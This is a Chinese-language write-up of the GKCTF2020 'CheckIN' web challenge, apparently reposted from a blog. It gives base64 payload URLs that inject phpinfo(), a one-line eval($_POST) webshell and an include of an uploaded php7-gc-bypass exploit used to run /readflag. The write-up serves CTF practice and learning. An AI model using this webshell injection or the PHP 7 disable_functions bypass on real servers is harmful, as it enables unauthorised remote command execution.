GKCTF2020 CheckIN Writeup
作者:互联网
打开实例是一段PHP代码。
通过代码没有发现反序列化函数,但是可以通过Ginkgo传参,但必须要传经过base64编码后的。上传phpinfo();试试,顺便看看php版本,将**phpinfo();
**经base64编码后上传。
payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==
如下图
上传个一句话木马试试,将**eval($_POST[a]);
**经base64编码后上传
payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1BPU1RbYV0pOw==
使用蚁剑连接试试
连接成功后,查看根目录
发现有flag文件,但权限不够看不了。readflag打开后乱码,于是想到执行readflag获取flag内容。但怎么执行呢,我也不会了,看wp后知道。php版本为7.3,这个版本有一个漏洞,php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令影响范围是linux,php7.0-7.3给出了exp
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php下载后进行修改,改为pwn("/readflag");,注意我这里将exploits.php文件改名为了111.php
上传挨个试,发现tmp可以上传,于是就上传到tmp中。进入tmp目录中,右键,然后点上传。上传成功后,执行文件包含。将include('/tmp/111.php');
经base64编码后上传。
payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=aW5jbHVkZSgnL3RtcC8xMTEucGhwJyk7
得出flag
这题难就难在那个执行readflag,以后要注意不同php版本的漏洞。
标签:tmp,Writeup,CheckIN,base64,readflag,Ginkgo,GKCTF2020,php,上传 来源: https://blog.csdn.net/qq_45619909/article/details/115598299